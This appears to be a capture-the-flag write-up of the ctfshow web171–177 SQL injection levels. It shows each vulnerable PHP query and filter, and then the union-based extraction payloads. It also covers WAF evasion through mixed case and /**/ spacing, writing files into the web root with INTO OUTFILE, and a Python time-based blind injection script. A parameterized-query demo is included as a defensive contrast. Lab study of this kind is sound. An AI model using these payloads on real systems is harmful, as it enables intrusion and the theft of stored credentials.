web171
SQL statement:

```php
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

The first challenge applies no filtering to the injection at all, so the universal bypass works directly, payload `1' or 1=1 --+`

Alternatively, first get the table name and then query:

1. payload `1' union select 1,2,database() --+` (or `union select 1,2,schema_name from information_schema.schemata`) to get the database name
2. payload `1' union select 1,2,table_name from information_schema.tables where table_schema=database() --+` to get the table names
3. payload `1' union select 1,2,column_name from information_schema.columns where table_name='ctfshow_user' --+` to get the column names
4. payload `1' union select id,username,password from ctfshow_user --+` to get the flag
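The root cause in every challenge on this page is the same: `$_GET['id']` is spliced into the SQL string. As an added illustration (not part of the writeup or the challenge code), the following Python script reproduces the web171 query against a constructed in-memory SQLite `user` table and contrasts the concatenated form with a parameterized query; the schema and the row contents are assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the challenge's `user` table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table user (id integer, username text, password text)")
    conn.executemany(
        "insert into user values (?, ?, ?)",
        [(1, "alice", "alice-pass"), (2, "flag", "ctfshow{constructed-sample-flag}")],
    )
    return conn


def lookup_concat(conn, user_id):
    """The challenge's pattern: the id parameter is spliced into the SQL text."""
    sql = ("select username,password from user where username !='flag' "
           "and id = '" + user_id + "' limit 1;")
    return conn.execute(sql).fetchall()


def lookup_param(conn, user_id):
    """Same query with a bound parameter: the input is data and is never parsed as SQL."""
    sql = ("select username,password from user where username !='flag' "
           "and id = ? limit 1;")
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    benign, hostile = "1", "1' or 1=1 -- "
    print("concat, benign :", lookup_concat(conn, benign))
    # The quote closes the literal and `--` comments out the username check and LIMIT,
    # so the concatenated query returns every row, the flag row included.
    print("concat, hostile:", lookup_concat(conn, hostile))
    print("param, benign  :", lookup_param(conn, benign))
    # With a bound parameter the same string is compared as a value and matches nothing.
    print("param, hostile :", lookup_param(conn, hostile))
```

The `username !='flag'` guard in the original query is defeated for the same reason: it lives in the SQL text that the injected input rewrites, which is why the later challenges move their checks to the response and still fail.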
web172
Query statement:

```php
//concatenate the SQL statement to look up the user with the given ID
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Return logic:

```php
//check whether the result contains flag
if($row->username!=='flag'){
$ret['msg']='查询成功';
}
```

Compared with the previous challenge, this one adds a check on whether the returned username value is flag, but the flag we want is in password, so it has no effect.

```sql
payload:1' union select 1,database() --+
payload:1' union select 1,table_name from information_schema.tables where table_schema=database() --+
payload:1' union select 1,column_name from information_schema.columns where table_name='ctfshow_user2' --+
payload:1' union select 1,password from ctfshow_user2 --+
```

```sql
payload:1' union select to_base64(username),password from ctfshow_user2 where username='flag' --+
```

Knowledge point 1: the encoding functions to_base64() and hex().
web173
Query statement:

```php
//concatenate the SQL statement to look up the user with the given ID
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Return logic:

```php
//check whether the result contains flag
if(!preg_match('/flag/i', json_encode($ret))){
$ret['msg']='查询成功';
}
```

Same as web172.
web174
Query statement:

```php
//concatenate the SQL statement to look up the user with the given ID
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Return logic:

```php
//check whether the result contains flag
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
$ret['msg']='查询成功';
}
```

The returned values may contain neither "flag" nor digits. We can use SQL's replace to swap each digit for a letter token and then write a script to swap them back.

payload:

```sql
1' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'0','numa'),'1','numb'),'2','numc'),'3','numd'),'4','nume'),'5','numf'),'6','numg'),'7','numh'),'8','numi'),'9','numj') from ctfshow_user4 --+
```

Then the script that swaps the tokens back:

```python
# Decode the returned value: each digit was replaced by one of the tokens numa..numj
a = 'ctfshow{fnumcnumjdnumfnumbnuminumi-numgnumcnuminuma-numeabe-numjnuminumfd-eanuminumgnumfnumbnumenumbnumbnumgnumcnumc}'

# token -> digit, the inverse of the replace() chain in the payload (numa=0 ... numj=9)
tokens = ['numa', 'numb', 'numc', 'numd', 'nume', 'numf', 'numg', 'numh', 'numi', 'numj']
for token, digit in zip(tokens, '0123456789'):
    a = a.replace(token, digit)

print(a)
```

This yields the flag.
web175
Query statement:

```php
//concatenate the SQL statement to look up the user with the given ID
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Return logic:

```php
//check whether the result contains flag
if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
$ret['msg']='查询成功';
}
```

All ASCII characters are filtered from the response, so we can use blind injection, or use file read/write to write the result into the web root.

Solution 1:

```sql
1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+
```

Then visit 1.txt.

Solution 2:

```python
# @Author:Y4tacker
import requests

url = "http://57e00653-fc1c-474b-9281-8f1dffb0bc34.challenge.ctf.show:8080/api/v5.php?id=1' and "
result = ''
i = 0
while True:
    i = i + 1
    # binary search over the printable ASCII range for the i-th character
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # time-based check: if the character's code is > mid the server sleeps 2s,
        # which trips the 0.5s client timeout below
        payload = f'1=if(ascii(substr((select password from ctfshow_user5 where username=\'flag\' limit 0,1),{i},1))>{mid},sleep(2),0) -- -'
        try:
            r = requests.get(url + payload, timeout=0.5)
            tail = mid        # answered quickly: condition false, character <= mid
        except Exception as e:
            head = mid + 1    # timed out: condition true, character > mid
    if head != 32:
        result += chr(head)
    else:
        break                 # no character at this position: end of the string
print(result)
```
web176
Query statement:

```php
//concatenate the SQL statement to look up the user with the given ID
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Return logic:

```php
//the passed parameter is filtered
function waf($str){
//the code is too simple to show
}
```

First, payload `1' union select 1,2,password from ctfshow_user --+`

It fails. Since SQL keywords are case-insensitive, first test whether the filter is case-sensitive: payload `1' union sElect 1,2,password from ctfshow_user --+`

That gets through.
web177
Query statement:

```php
//concatenate the SQL statement to look up the user with the given ID
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Return logic:

```php
//the passed parameter is filtered
function waf($str){
//the code is too simple to show
}
```

First enter `1'--+`; no data comes back. Switching to another comment style, payload `1'%23`, works, so the guess is that spaces are filtered. First try the universal password:

Solution 1: payload `1'or(1=1)%23`

Knowledge point: in SQL, `/**/` can stand in for a space.

Solution 2: payload `1'/**/union/**/select/**/1,username,password/**/from/**/ctfshow_user/**/where/**/username='flag'/**/limit/**/1,1%23`